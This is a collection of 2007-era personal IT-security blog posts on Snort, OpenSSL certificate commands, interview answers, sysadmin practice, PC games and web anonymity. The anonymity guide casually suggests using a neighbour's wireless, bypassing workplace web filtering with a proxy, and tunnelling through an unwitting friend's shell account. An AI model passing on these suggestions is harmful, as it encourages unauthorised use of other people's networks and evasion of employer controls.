Texas A&M has won the 2007 Collegiate Cyber Defense Competition. I really feel that live defense and attacking competitions help everyone involved, including spectators. Even if it is just amongst friends or at a con or even something as organized as collegiate level activity, this kind of live-fire stuff needs to grow and will continue to grow in popularity and exposure. If you get a chance to go to one of these events either as a participant or to hang out, I encourage you to go. Don't do like I did last year and skip out on a local CyberDefense competition for no real good reasons.

I like tutorials on sites. Even if I don't get around to trying out new things, it is nice to have the knowledge fly by my sight and to tuck the link away into my pocket (or a site post) for a rainy day when I decide I want to try it out. This link talks about using Snare and Splunk as a central multi-system log-gathering solution (a cheap alternative to LogLogic). I do need logging someday and definitely have plenty of options, including this combo.

Snort is another item I want to start working with regularly as well. I know I won't become a Snort guru quickly, and just like any type of packet-watching role, it just comes with time and experience. This Ubuntu + Snort + Postgre tutorial may be helpful, even though I already have my Ubuntu "server" box upgraded to Feisty Fawn and might swap out Postgre for MySQL instead. Sadly, just last night I noticed my Ubuntu box (which has a decently new 200GB HD that has already developed a loud whine when it spins) may not be faring so well anymore after power outages. I had one this weekend and the console might be stuck on a BIOS or GRUB warning since it is silent on my network. I have to check it out tonight. Hmm...it might be old enough that it still requires something plugged into the keyboard port in order to boot properly... Got this link from Andrew Hay.

Network Computing has a nice comparison between Vista and Ubuntu. I've yet to even see Vista, really, but I can say I was disappointed that they didn't include DVD playback with the multimedia testing. Due to the proprietary encryption with any DVD playback, free and legit Linux distros tend to not be able to do this out of the box. I was happy to see mention of Ubuntu's occassional (and very frustrating) hardware issues (namely wireless or sound issues from what I've heard) which can send people back to Windows quickly.

I think Ubuntu is a nice alternative for light users who don't install their own things and only need major things like email, web browsing, maybe some IM, music, picture viewing, and office productivity. Basically you don't need much more beyond what is installed by default. If you need more, you might be in for some learning curve issues.

As computer and security hobbyists and professionals, I'm sure we all go to movies and take special note when something in our field comes up, from door locks to computer terminals displaying code to fuzzy images being blown up to reveal faces. Some of these make us cringe in wild distaste which pulls us out of the suspension of disbelief in the film experience while others make us smile and slightly nod in agreement, making a mental note to share with our other geek buddies.

I have made a new category for this site called, simply, movies. In this category I want to make mention of movies that utilize a particular bit of computer use or security use and point out what is inaccurate about it. In fact, I'm going to call it Computer and Security Use in Movies (CSUM).

Just to get a few ground rules out of the way, I will largely exclude sci-fi movies that assume advancements in technology make certain things possible or different from how we know computer security today. I also only want items that seem important to some degree to the plot of the film, and not just some extraneous bells-n-whistles item from the background. For instance, nothing from Star Trek will count.

I will score each incident based on some criteria, modeled after a security assessment:

Inaccuracy: 1-5 (5 being ridiculously inaccurate and 1 being only minorly inaccurate)
Inaccuracy is used to scale exactly how ridiculous a particular use of computers and security is portrayed. Something that is not ridiculous at all, and, in fact, might be entirely accurate may be able to score a rare 0 in this category, thus ensuring a total score of 1. A 1 is the ultimate score.

Criticality to plot: 1-5 (5 being critical to the plot or film experience and 1 being trivial)
If an inaccuracy is highly critical to a plot, it becomes less forgiving by the audience. Likewise, inaccuracies in smaller, less important parts of the film can be overlooked. This is a scale on how important the situation is for the movie as a whole.

Ease of correction: 1-5 (5 being extremely difficult or impossible to correct without the plot or film experience falling apart, 1 being extremely easy to fix without impacting the film)
If an inaccuracy is easy to correct, it really shouldn't have been a mistake in the first place, and might just be the fault of the technical advisor or writer, or maybe even an artistic decision because the real deal is boring to portray. Something that is extremely difficult to correct means that inaccuracy is so deep, there really is no way to save or spin it without running into major problems. This is essentially the scale of how badly wrong a movie gets this situation.

The total is the product of all three numbers multiplied together to give a score from 1 to 125. Hopefully no movie scores 125 as that would be a ridiculously innaccurate, critical situation in the film that has zero hope of being fixed without the film falling apart. Feedback and suggestions on better scoring are welcome!

CSUM rates: Independence Day (1996)

Situation: Towards the end of the film, Will Smith's character makes a last ditch attack against an invading alien army by injecting a computer virus into the alien mothership's systems. The virus is successful and the invasion is defeated.

Inaccuracy: 5
Ok, while I will say that one could argue the universality of the binary system, I don't think it is even possible that a wholly distinct civilization will have advanced independent of the human race and end up with compatible machine code. Hell, Windows and Macs don't even have viruses that are compatible on either system (a few exceptions exist with third-party apps) let alone entirely different civilizations. I think the biggest joke at the time of this movie was the question, "Are the aliens running Windows or something?!"

Criticality: 5
Maybe the budget disintegrated by the end of the film and they needed a one-shot deal to blow up the aliens; all of them. I don't know, but this is a pretty darned critical contrivance because it is the vehicle for Will Smith to save the world; the climax of the film. It's a shame it had to be so ignorant.

Ease of correction: 4
The year is 1995/1996, and I think it was obvious the producers wanted to capitalize on the emergence of computers and the Internet, and with it viruses. Unfortunately, there is no salvage to getting an earth computer virus to disrupt alien technology, so there is really no saving this idea. The writers needed another entirely different solution to save this; even Will Smith flying into the center of the ship and destroying the Mother Brain would have been more believable.

CSUM ICE Score: 100 (F) I will never forgive Independence Day for this amazingly ridiculous use of a virus in a film.

An article out of IT Management on Earthweb (hell, I can barely found out what this site is called...it management? earthweb? datamation? I think that's an ad in the traditional site header slot, but am not sure...ugh!) outlines 10 top open source security tools. While I can usually nitpick something in most lists from unknown sites, I was pleasantly surprised by the well-rounded list presented. Then again, some of these can be fairly easy when you have lists like Insecure.org's top tools list.

I also am saddened but have to say (almost as a reminder to myself) that I need to someday actually read the Open Source Security Tools: A Practical Guide to Security Applications. Books don't get younger on their own!

This is a list of 20 web developer interview questions picked up from SEOmoz via Dan Morrill. I really like interview questions because they can give you good practice. When I am looking for a job (which I currently am) I actually do rehearse to myself (and typically write down) answers to typical questions such as my weakness, my strength, team vs work alone, why the current job is not right, what I want in a job, a manager, life, and so on. In fact, I plan to carve out a spot in my wiki to someday house these questions and my answers for future reference. And one thing I do stress in any interview is to be honest and positive. Admit a weakness, don't cop out or cover it up. Use it as an opportunity to show the employer you know yourself and that you have a plan to address that weakness. Anyway, this looks like a long post, but here's some answers for these questions (some are pertinent only to web developers, though!).

1. What industry sites and blogs do you read regularly?
I tend to cop out here and say that I read a lot of things, mainly blogs and online news sites, which are all in my RSS reader and listed on my website on the right. But I do try to stay concrete and mention some of my A-list links such as TaoSecurity, Jeremiah Grossman, Ha.ckers.org, Security Monkey, Internet Storm Center, Errata, F-Secure, Full Disclosure, and so on largely depending on what type of job I am working on. I do like to make sure I know a nice mix of my favorite sites to read so that I can pull them out quickly without floundering. I remember years ago someone asking me what my favorite hacking site was and kinda floundering and sputtering out PacketStorm just because the guy was a suit who thought he knew hacking. When given a chance, though, I always want to say that I read up on sites every other day if not daily for the important ones.

2. Do you prefer to work alone or on a team?
I love this question and hate it. I love it because my honest answer is both fairly equally. I hate it because that is the prototypical bullshit answer. So I feel obligated to expound! I love working alone because sometimes you can just put your head down and really concentrate on working either through a problem or something that is otherwise tedious. It is true that sometimes in IT too many hands in the kitchen make too big a mess, or will try to do things in different ways such that nothing ends up getting done with any semblance of quality. I also love working on a team because there are times when I don't know everything and need help, times when I physically cannot get all the work done by a deadline without extra hands, and times when just talking a problem through to someone else will jog my thoughts and give me fresh ideas. I truly do enjoy both and am quite comfortable working in either environment as long as the company and manager and colleagues are supportive and get shit done. I have experience working both ways.

3. How comfortable are you with writing HTML entirely by hand?
Very. I've never used a WYSIWYG editor and don't even need color-coded parsing to help out. Give me notepad and I'm fine.

7. Describe/demonstrate your level of competence in a *nix shell environment
I would put my level of competence in a *nix shell environment as beginner to intermediate, although people less than me might put me higher. I tend to place myself lower than I should be, only because there is so much power in *nix shells and so much to learn. I feel just slightly more comfortable inside a CLI as opposed to a GUI.

8. What skills and technologies are you the most interested in improving upon or learning?
For a learning junkie like me, this includes everything! I am most interested in learning whatever is needed or is tickling my muse at the moment, within reasonable bounds so that I don't try to do too much and end up with minimal knowledge in lots of things. I do strive for expert level knowledge in the things I can tackle on a day to day basis and intermediate to high knowledge in things I do on my own or less often outside the day to day job. Specifically, I want to continue to improve my Linux exposure, wireless foo, and security assessments. I want to get hands-on into Snort and log correlation over a network.

11. Show me your code!
View source my code yourself! But keep in mind I'm not a pro web developer, nor do I update my code all that often. My old site is rife with old junk that makes me cringe. This site is slightly cleaner since it is years newer.

12. What are a few sites you admire and why? (from a webdev perspective)
Digg and Google are excellent and clean. I like sites that are clean, offer up their functions, and are not hard on the eyes and soul (ads all over, weird links, blah blah). Give me aesthetically pleasing any day, not MySpace-like. A clear, simple layout.

14. I just pulled up the website you built and the browser is displaying a blank page. Walk me through the steps you'd take to troubleshoot the problem.
Blame the network guys! Hehe, kidding. I would first replicate the problem on my end so that I can see what is going on. Then try to do a view source to make sure I'm hitting the right location and what the browser is being presented. If the problem is network-related, drop into a CLI and start investigating DNS and IP connectivity. If the probem appears to be code-related, check the code from the View Source and make adjustments. Possibly get on the server and try to pull the page up local to the server, check the logs, fashion test pages to troubleshoot IIS/Apache functionality...

16. Do you find any particular languages or technologies intimidating?
I really like this question and have sadly never heard this in an interview! I am currently most intimidated in general in just doing something new for the first time that I'm unproven with. For instance, being challenged to do something that might not be possible can be really intriguing yet frustrating. I'm aware of this intimidation and work to keep it cornered as much as possible. In specific, I am most intimidated lately by ordering the proper equipment that is compatible and not over-budget for the needs. I think that's largely inexperience coupled with spending someone else's money.

I've been an on-again, off-again PC gamer. My background is heavy into first-person shooters (FPS) from Doom 1 until FEAR. I think I spent half my college years playing Quake and UT. It's amazing I actually got the grades I did and even graduated...I know too many people who dropped out due to their playing habits.

Here are some games I would highly recommend you play if you do any PC gaming at all. Some of these are classics that no one should be able to say they've not experienced.

Doom 1 and 2 - There is still no FPS PC game the has been able to recapture the hectic, hellish feel of the originals. Doom 2 is still so challenging to this day to me, that I continually play it every few months to advance a few more levels in my spare time (I strive for 100% secrets and kills when actually possible). I still have the original floppies...

Quake - Quake grabbed the baton from Doom and ran with it, propelling PC sales, bandwidth demands, and PC gaming as we know it today. Nothing ever will capture the feel of anonymously running around levels throwing out rockets and fragging fellow geeks into the late hours of the night. This was Internet gaming in its innocent infancy, and it still makes my cheeks tingle with memories. Must be experienced not just single-player, but LAN-borne with friends. Sound effects and most of the background music mixed by NIN make for an excellent backdrop as well.

Serious Sam I - The first Serious Sam had a lot of gimmicks, but one of the best things about this game is how it harkened back to the hectic pace from the original Doom games. No game has come closer to the single-player experience of Doom as this game as it throws hordes and hordes of enemies at the player and usually not enough ammo to feel comfortable. One of the only games I've ever actually heard the sound effects for when trying to sleep (those damned hooves...noo...always behind me...!)

Unreal Tournament - I really don't think any game before or after has looked or sounded quite as good as this one while also being as purely fun in multi-player mode. The excellent electronica music alone is worth the ride. Sadly, if you do get on FFA games these days on the net, chances are you'll be playing with people who have played for nearly ten years now. It won't be pretty, but it can still be very fun! Perfect LAN party fodder as it won't tax systems these days!

Warcraft II - Basically the father (albeit not the grandfather) of all RTS games today, Warcraft II had a perfect chemisty of fun and challenge. I still play this game through single-player mode every few years. The expansion pack is also a must.

Starcraft - The follow-up to Warcraft II is maybe even more perfect with upgraded graphics, deeper complexity in units and builds, and one of the most compelling story lines I've played through in a PC game. I also play this and the expansion pack regularly every few years.

Wing Commander II and III - I loved these games. I'm not a flight sim guy, so these games met my needs just right with complex, but not too complex of controls. I loved the changing experience depending on how you complete missions and the special names enemies with their own challenges and quirks. WC III particularly perfected the sense of isolation for a space fighter pilot.

I see ISC has posted about a vulnerability just disclosed in Trillian. The vulnerability is a little exotic but does have a scary side to it. First, it involves the use of the Trillian IRC client. Thankfully, I don't know many non-geeks who use IRC and none that use Trillian as their IRC client (I would hope!). The scary part is it is trivial to determine if someone's IRC client is Trillian and the vulnerability is triggered by merely hovering over a link posted in chat. Yikes! I expect milworm or even Metasploit to have an exploit available soon enough.

One big question for this is: Do you know what apps your users are running? Are some of them running Trillian? And if so, who is then responsible for upgrading to more secure versions of their apps? (Then again, maybe they don't need IRC at work anyway, so just block the ports at the firewall and hope they're not on laptops at home being rooted?) More fuel if you don't have a handle on corporate policy for unauthorized software.

Chief Security Monkey has a story post today about being careful what you say as an IT expert:

I went back to my friend, told her that there was nothing unusual on the IDS and mentioned the targeted Word attack that had been reported [by another company] and its similarities. Unfortunately, the helpdesk tech overheard our conversation and subsequently reported back to his boss that I said we were infected and that was the cause.

Oh man, I really hate that! And some people wonder why we become a little guarded and seriously careful about what we say! I've had occassion where I've responded to spyware or virus and mentioned something about attackers or hackers and the gossip centers on just one word that you can easily guess: "We've been hacked!" I've had sales people email each other for hours escalating the issue just amongst themselves before someone had to step in and tell them to shut up because it wasn't true.

Of course, this happens in IT as a whole too. I hate having to say, "Well, in our environment we really can't implement technology X very well at all..." only to have their Geek Squad son say, "Sure they should be able to do that!" which causes me months and months of grief and point-counterpoint.

Again, I say, it's no wonder we can quickly become guarded and quiet unless absolutely sure about something.

So, to spin this back around into something positive, how does one combat this? I think it is just all about people skills and communication skills. Make sure people know you as the expert and that mistakes or misstatements can still happen, but you'll gladly offer correction as needed. Don't be afraid to be wrong and don't be so arrogent that everyone wants to hold your mistakes over your head for years to come. Learn who the drama queens are in the company, and be extra careful what you discuss with them.

Web browsing (blogs, forums, web-based IRC) - When you browse the web, you leave a trail in your wake: your IP address and sometimes other bits of data that curious persons want to gather. If nothing else, you leave behind your IP in web server log files which any curious or enterprising admin likely picks through. Why do you want to stay anonymous? That was addressed in part 1 of this series.

There are five major realms when it comes to anonymity on the web:
1) general anonymity protections
2) browsing trackbacks such as what is captured in web server log files
3) browser hijacking, remote information leakage, and artifacts like cookies
4) communication channel eavesdropping
5) additional items on newsgroups and RSS

1) general anonymity protections
In general, if you want to stay anonymous online, don't connect to sites or other servers from your home IP address. Hop on a wireless hotspot or "borrow" a neighbor's wireless connection (again, I didn't suggest that...right?). This way any tracebacks will maybe point to the state or area you live in or even your local podunk ISP, but likely won't be tracked back directly to you without some legal overtures. If you're doing nothing criminal, the chances are slim that anyone will ever notice. (Although that does not necessarily make it legal or digitally ethical.)

If you insist on doing personal things such as banking or updating your own personal blog that is not so anonymous, those are things you should save your home IP and connection for. Keep in mind that I do not encourage checking your ebay auctions or transferring paypal monies through web proxies or while connected to non-trusted networks. You never know who is eavesdropping on you or collecting information on what you thought was an innocent open web proxy.

2) trackbacks via what is captured in web server log files
Browsing trackbacks include leaving behind information on log files that may contain your IP address, computer name, browser version, and so on.

The biggest means to stay anonymous with general web browsing is to use one or more anonymous web proxies. A web proxy will relay your connection from it to the site you are attempting to browse, such that the target site does not know who you are and instead records information from the web proxy server. Let's say you want to buy some condoms, but your dad works the counter at the closest drug store that sells them. Instead, you ask someone else to go inside and buy them for you. This person is acting on your behalf, i.e. your proxy. Web proxies work the same way by fetching web pages on your behalf and then delivering them to you. Honestly, once you start using proxies, they are very easy to use and you should probably use them most the time if you are concerned about your anonymity (with the exception of your bill-paying and banking...).

These can be a bit of a pain to work with. Some web proxies are located in odd places of the world and thus their latency is sometimes prohibitive. Others actually translate text for you (eternally helpful, especially if you don't speak Lithuanian...), and others are simply not meant to be open and can disappear without notice. Some are commercial and some are not and some don't even know they are open and used.

One long-standing list of web proxies has been samair.ru. Be aware that not all proxies are made equal and you will want to test out just how anonymous you appear. Do not settle for leaking any information, so typically, you want "highly anonymous" or something to that effect. Setting yourself up on a proxy is as easy as picking one out and going into the connection options of your browser. Supply the necessary IP and port as a proxy and surf away. You can check what your IP appears to be at www.whatismyip.com and you can check your actual proxy leakage at samair.ru. I highly suggest Googling up a few proxy checker tools just for second and third opinions. Also, try baselining the information you leak by using these checkers when you're not using a proxy. Identify what you want hidden, and get it hidden. (Disclaimer: I don't encourage you to use web proxies that you are not authorized to use; do as you wish.)

I also have seen a site called www.e-proxy.info (thank you Chris!) which can deliver web pages to you through a browser-based proxy. This is really pretty slick and actually works in my office, bypassing SurfControl while also not looking too obtrusive by hiding up at the top of my browser window. Sweet!

As an advanced technique, if you want to set up a series of proxy servers to route your traffic through, this is typically called chaining, in case you want some Google terms to search for.

Are these foolproof? Like almost everything in life, no they are not. But for many instances, a relatively simple step like using a web proxy gives quite a lot of gain. One potential problem comes up if you use some arcane or exotic user agent or web browser. If you leave behind an anonymous IP but a user agent like "BriansTestBrowserBar 0.4," you may as well ditch the proxy.

3) browser hijacking, remote information leakage, and artifacts like cookies
While you can remain relatively anonymous on the web using just a proxy to relay your connections, there are still means to leak information. You might run into hostile scripts that will try to hijack your system or perhaps harvest cookies from your browser, just to name a few.

To thwart such attacks, it is best to not pretend you are safer or anonymous using Windows or Internet Explorer, especially in combination. Use a non-Windows OS and Opera, Firefox, or even a graphical browser.

Keep your cache and stored cookies as clean as possible. Try not to store cookies and definitely do not store passwords in your browser. Just write them down or store them more securely out of band of your browser. In fact, it makes a lot of sense to do your anonymous web browsing from a virtual machine that you can revert to a known clean state every day.

Be sure you also do not leak information by reusing usernames and passwords. If you use the username TheAvengerr69 on 4 forums and you use the same password on each one, simple Google searches can draw the lines between them and start revealing a profile of who you are and what you do. This is especially useful to someone looking to manipulate you. Also assume that every site you sign up for has curious admins who now have your account information. Do not blindly reuse login names and/or passwords.

Here is an illustration. Think about how many forums you might have signed up for and posted one, maybe two questions, and then never revisited again. What if those forums, like the many thousands out there, do not get updated with new forum software versions. This might mean that one of those forums may get owned and leak out its database of users (sure, they just want the emails to spam, right?). Now your account information is in someone's hands just because you visited there once. Now let's say your username was DopplegangerJoe69 and your email was a hotmail address and your password "sitonyourface." In fact, that's the same password and username you use in a few places. Oh my, and that's the password you use for that hotmail account. Sucks to be you, Joe. I hope you don't store a lot of "password reminders" and "thanks for signing up here's your password" emails on that hotmail account!

4) communication channel eavesdropping
Generally, there is not much you can do to protect the communication channel from eavesdroppers, if, for instance, you are browsing the web from a public hotspot. If the site itself does not have SSL enabled, you are typically out of luck. However, some proxies can be set up to relay secured communications. Better yet, find yourself a box or shell account or buddy who doesn't know better and set yourself up an SSH tunnel which can act as your first hop. While your entire communication may not be hidden, at least you are hidden from where you physically sit to some arbitrary place on the net. The easiest way to do this might be to set up an SSH server and tunnel through your home connection. From there, relay through a web proxy to anonymize yourself. You can also utilize Tor onion routing, which I plan to go over in a separate post.

Of note, I do consider this step to be beyond most everyone but the paranoid, but it does make sense to technically-friendly people who browse from untrusted networks often. Personally, I love hotspots at coffeeshops so I tend to tunnel through SSH whenever I do anything beyond browsing the news.

5) additional items on newsgroups and RSS
Two minor tidbits on newsgroups and RSS feeds. Try to not use stand-alone clients on your box for RSS or newgroups browsing. They typically aren't as universal when it comes to proxy support, so they tend to directly connect to the target and leave behind your IP address, if nothing else. Whenever possible, sign up for Google Reader or Google Groups and leverage the extra hop that Google provides in hiding origin. Let Google's servers act as your proxy. Be aware that there is still theoretical talk about malware abusing RSS feed parsing. I don't consider this a reality yet, but the theory is sound. Newsgroups also may have messages that contain malware or malicious links. Be cautious.

Bonus: For the truly paranoid, watch what terms you search for in search engines. Last year there were some high profile disclosures of search terms that, while "sanitized" still revealed sensitive or private information. If I searched for "Michael Dickey" in Google from my "anonymous" web proxy that I've used for years, I've just tied that web proxy IP to that search term. Do enough of those personally identifiable searches and you can leave behind a small trail. Now, the chances of all the planets aligning to reveal your searches and shatter your web of anonymity are slim, but there are some people that are this paranoid. If you want to help prevent this, just search for personal stuff on your own home connection, just like you should be doing your banking and other sensitive stuff from your trusted home connection. Likewise, don't search for HideousPurplePeopleEater69, your super-secret online pseudonym, from your home network and tie that name to your home IP.

Do I go to these lengths myself? I definitely do not get draconian about my search terms, but I do encourage using different networks or web proxies for browsing the darker bits of the web. If I felt the need, I likely would also utilize a throw-away VM to do some browsing as well. I think myself and most tech-savvy persons can get by with following, to some degree, steps 1, 2, 3, and 5. Setting up your own remote secure access and being mindful of your searches are really for either the more technically-inclined or the ultra-paranoid.

If you would like more information about staying anonymous on the web, I suggest searching Google for "staying anonymous on the web," "onion routing," "SSH tunnel," and other keywords found scattered above.

WSUS 3.0 has been released. I'm bouncing this link over where I found it, The Sean Blog, since he made a nice list of the pertinent downloads. If you don't know WSUS or don't use it and don't do anything special for Windows patch management, you should really look into WSUS. It does one set of tasks and does it very well.

If you impose punishments on the troops before they have become attached, they will not be submissive. If they are not submissive they will be difficult to employ. If you do not impose punishments after the troops have become attached, they cannot be used. -The Art of War, Chapter 9: Maneuvering Armies

Roger A. Grimes recently posted up an article that made a lot of simple sense. He talked about the effect of consistency, even amongst just the basic security principles, and how that can increase security. I really couldn't agree more. Consistency is highly important. Of course, metrics are important, but also make sure to pick the right ones and be consistent with them as well.

How many of us work in computer security environments where basic security recommendations are not applied consistently? I think it is nearly impossible to find a company that consistently and universally applies basic security tenets. So, we have inconsistencies, cracks in the system, and bad things are allowed to occur. The very human nature of purposefully allowing inconsistency as a norm leads to below-average outcomes. Taking a personal and institutionalized interest in applying basic security principles consistently will mitigate more risk and lead to a more secure environment.

I like the idea of posting regularly the things that I've learned. I've long put off getting SSL on this site, but I think I need to get with it to secure what few logins I have (which I only use at work and home anyway...). Curiously, this week I've been working with SSL at work, so I learned a few things running OpenSSL. Here are the basics. (technically I relearned this since I've done this all years back, but had to look it all up again anyway...)

To split an exported private key/certificate from IIS (.pfx format) into a more readable format:

openssl pkcs12 -nodes -in exportedfile.pfx -out outfile.pem

If you provided a password (like a good IIS admin!) to the exported private key, you will be prompted for it. To view the private key and certificate parts, just open the resulting pem file in a text editor. Both parts are enclosed in appropriate tags.

To just view the private key and certificate from the pfx file:

openssl pkcs12 -info -nodes -in exportedfile.pfx

To make a Certificate Signing Request (CSR):

openssl req -new -newkey rsa:2048 -keyout yournewkey.pem -nodes \
 -out yournewcsr.pem

Save the key because this is the private key. Provide the yournewcsr.pem contents to the preferred CA such as Verisign, Thawte, or even your local CA if you have your own PKI. Once you get the certificate back and you're using Apache, you want to follow Apache instructions (I'll post this another time) to place the private key file and this cert file where Apache can use them. If you're using IIS, you probably want to convert it back into the normal pcks12/pfx format:

openssl x509 -in certnew.cer -inform DER -out yournewcert.pem \
 -outform PEM

You can then import it into IIS for use with web sites. In my case at work, we just left the pieces separated for use in our new Load-Balancer/SSL Terminator. Our IPS, however, would prefer the compounded format used by IIS along with the passphrase.

What if you just want a self-signed cert? This means it is free to you, although your browser may give fairly benign complaints about the cert not being signed by someone you trust. This is ok for most sites, including mine and other internal stuff:

openssl req -x509 -days 365 -newkey rsa:2048 -keyout myselfsignedkey.pem \
 -nodes -out myselfsignedcert.pem

Might want to increase the 365 days to many, many years. Ten years is pretty decent and a bit easy to calculate (3650).

All of these commands used -nodes which does not mean "nodes," it means "No DES." This leaves the private key unencrypted. For anyone who has studied CISSP material (or even Security+) you really don't want to leave your private keys unencrypted. You want them encrypted:

openssl rsa -des3 -in  \
yourprivatekey.pem -out yourprivatekeyencrypted.pem

This will prompt for a passphrase and output the private key in an encrypted form. If you want to decrypt this key later:

openssl rsa -in yourprivatekeyencrypted.pem -out yourprivatekey.pem

I think that about does it for now. OpenSSL has tons of little options and modes, so if you find yourself getting an itch to learn more about SSL, check it out. Oh, and it comes in Linux and third-party Windows flavors for convenience. I actually really like the Windows version as it gives some nice, powerful tools for quick use to otherwise clunky Windows GUIs and servers.

I've posted about baretail previously as a tail program for Windows, but now I see there is a similar tool with some more functionality to it. fLogViewer picks up and runs with the "Windows way" by taking a simple tool and putting more and more features onto it (note: Yes, I am fairly sarcastic there, but the features are appreciated nonetheless!). I kinda like this tool, although the necessity of an install and the way it uses some older system files than what I have on my XP system anyway are detractors to replacing baretail with fLogViewer.

Start the weekend off right with some off-topic reading pleasure. EW has a list of the top 25 moments in sci-fi in the past 25 years (and proper apologies for not being able to include Star Wars 1977 because it is too old). I definitely think I have a few television shows to watch as they appear on DVD. Excellent list!

Lists by IT guys cum journalists can be pretty interesting things. Either they're obvious junk or sometimes just plain wrong. I eagerly checked out this link Marcin sent me about 7 things sysadmins forget to do thinking it would be pretty stupid. I was pleasantly surprised with a few of the items. Here's some of my comments.

1. Forgetting to Delete a Former User's Account - This is one of those obvious ones, but I will defend poor sysadmins like myself and say that we don't just willy-nilly disable user accounts, even if we hear gossip that someone left. Too often, account disabling is not a breakdown of sysadmins, but a breakdown in the process of notifying sysadmins that someone has left. I really hate hearing someone "left 3 weeks ago" through the grapevine. (Or conversely, that "I have someone started tomorrow morning...") Maybe in huge environments things like identity management should be looked at to solve this issue, but in smaller or medium environments, I really think HR and IT just need to make sure there is a process for account notification that is followed. In the end, all the sysadmin lists and processes are naught if no one says so-and-so is gone.

2. Forgetting to Regularly Search for Rootkits - Ok, this is just kind of a weird one. I don't think I've ever "forgotten" to search for a rootkit so much as I just don't look for them, or if a system is so obviously overrun it gets reformatted rather than spend more time on it.

I think the author has good points about how to mitigate rootkits and detect them, but seriously, how many admins put forth that much effort? Rootkits are the Harry Potters of the corporate IT household. They want to be kept under the stairs or up in their room and ignored and not dealt with...and for good reason. It is almost like having mice in your building. You can put out some traps, but really, no one is going to bother much with tearing up the walls trying to find their homes.

I sound kinda defeatist here, but the effort to find and protect against rootkits is a big investment, really. I just think this isn't so much forgotten as it is just chosen not to be done.

3. Forgetting to Use a Trouble Ticket Tracking System - Here's a personal bit about me: I'm a stickler about documentation and the sharing of information. There is too often a HUGE amount of organizational knowledge that leaves when an IT worker leaves a position. That shouldn't be the case, they should keep things documented for someone else to reference.

A trouble ticket system is part of that. If I know I've worked on something before, I want to be able to search the tickets and see what remediation occurred previously. I think some of this comes from my science background where experiments have to be documented such that someone else can recreate your findings. That''s a big part of what a ticket system is to me.

Not only that, but it can be used to audit changes and requests. If Sally requested file server permission changes and was authorized to do so, but made a stupid request that caused data loss, that can be traced back to her ticket and the information in it. I also feel that, as a heavily-worked IT guy (and later on in my career, likely a manager of some sort), the ticket system is a natural means to track work loads and inefficiencies and reduce forgetfulness. Unless a ticket system has no means for internal notes (things not sent back to the requester) I really hate, hate, HATE to see tickets answered with, "Done," and absolutely no details on what was done...

There is one caveat to this, however, and would be Needy Users who have Stupid Questions but they insist on asking in person or calling in about them when their deadline is 1 hour away. Often, it might not be sysadmins who forget to use the ticket system, but users who bypass the ticket system to saddle IT with work requests. Sysadmins are then left to hopefully remember to put in the ticket themselves.

4. Forgetting to Set Up Technical Documentation and Creating a Knowledge Base - Based on my notes above, it's pretty obvious this is a sticking point with me as well. I deeply believe in the need for clear, effective documentation and maybe even a knowledge base. This should occur in IT shops of 1 person or 1,000 people. Even if I don't plan on leaving a job, there are always systems and processes that occur every 6 months or longer, and I hate to get to those points and not remember what to do. Referencing documentation helps speed up memory, get the tasks done efficiently, and improves consistency by not forgetting steps or retracing old mistakes. This can even be part of a DR/BCP or backup strategy, where network diagrams, IP distributions, config files, and other settings are documented somewhere for use in continuing the business in the case of large of small issues.

5. Forgetting the Risks of Flash Memory Drives - This also falls into "I didn't forget it, we just don't do this" category. By now, I really think everyone knows the issues with USB drives. They can introduce things not wanted and are a vehicle for data egress. You'll notice the author gives not even a single sentence on how to address this or what approach could be taken. There's likely a reason for that. Many people either don't know how to manage USB devices (do you know how to stop USB drives but allow USB mice/keyboards?) or can't get senior management to back the blocking of ports. Ever try to block USB/Firewire ports and have all the ipod users mutiny? Ever try to justify buying a certain USB brand for "official" use and tell people their personal ones won't work? This isn't so much forgotten as it is just not a battle to be fought or teams lack the knowledge to truly tackle it. There are far easier fires for most sysadmins to fight right now. The coming years should hopefully make tools to do these things easier for us admins, but they won't be getting cheaper or easier on the workforce at large, unfortunately.

Of note, for anyone who wants to limit USB drives, did you also limit floppy drives back in the day? Do you limit CD drives now? What is your basis for managing those differently? Honestly, USB drives can be argued to simply be part of our culture now, just like cell phones and the compact disc. Just be aware of that when trying to limit them and how that might affect employee happiness aka productivity, especially if your business is not subject to stringent regulations about tracking data egress.

6. Forgetting to Manage Partial Root Access - I don't really have anything to say here.

7. Forgetting Courtesy - This is a mixed bag with me. I agree, courtesy needs to be extended in a company, not just from IT, but from everyone. Each company is really just one big team trying to work together to do Great Things, but too often that courtesy breaks down somewhere, and that little ghost of rudeness gets passed around like a flatulence cloud hovers and moves unexpectedly.

Yes, some IT guys are just rude and give evil looks when asked to assist with something. But I've often seen and felt that some of that rudeness is not something IT guys inherently do, but have been trained to do by poor management or abusive users. How many IT guys have tried to do the right thing by helping people, only to get sucked into tasks that aren't their responsibility just because they happened to make eye contact at the wrong time or try to help someone else?

At my last job, we had an HR director who needed regular help with her computer. I gladly stepped up and enthusiastically helped her early on. But she was one of those people who cannot be satisfactorily helped unless you do her job for her. Sadly, I couldn't do that, and some of the things she wanted were simply not even possible. She became the "oh god, don't help her, don't get involved because you can't win! Even if you win, she'll eventually get you to do things that you just can't do and then you're in the shitter!" IT support nightmares. In fact, I think every IT guy at that company who has tried has either left that company or is still in the shitter with her (and being in HR, you know what that means...). (Hell, I even got in trouble once because she asked me to rewire an electrical outlet and I said that needed to be done by a qualified outside contractor that the CFO would set up...)

Too often I really think IT guys are conditioned to be evil eye guys and this is as much a reflection on the corporate culture and their managers as it may be their inherent personality. Some people are assholes, but a lot of us are not.

(By the way, a lot of us IT guys have a ton of things to think about as we walk the halls to get from one place to another; we're often thinking about some problem or improvement, so if you stop us in the middle of the hall with some Stupid User Question and get a queer look, that just might be us trying to switch into help mode or tie off our internal thoughts to properly come back to them later. Or we know that Needy User has just circumvented the aforementioned ticket system by asking us in person, and will give us his own Evil Look when we plead that he make a ticket request since we're currently in the middle of something for More Important Needy User...it's a no win situation for us sometimes.)

David Maynor recently caught some attention by being critical of how Airtight protects a wireless network from rogue APs (and clients). I'll let the link speak for itself on that, as well as the Airtight CTOs take on the comments section of a post on Andrew Hay's site (and Mike Rothman's for that matter).

What I found even more intriguing was the link to a 2005 paper from Joshua Wright discussing the flaws and details in wireless IDS/IPS methods of containing rogue wireless clients. Joshua Wright has an amazing ability in his papers to write very clearly and plainly, making the information easy to follow, and while the paper comes in only at 17 pages, I thought I would paraphrase his key points a bit in this post.

Wireless IDS detect and then try to disassociate/deauthenticate (deauth from here on) rogue clients.
Some try send deauth frames to the clients, some also to the appropriate access point.
Some just vomit out deauth frames, others are more timed to respond efficiently.
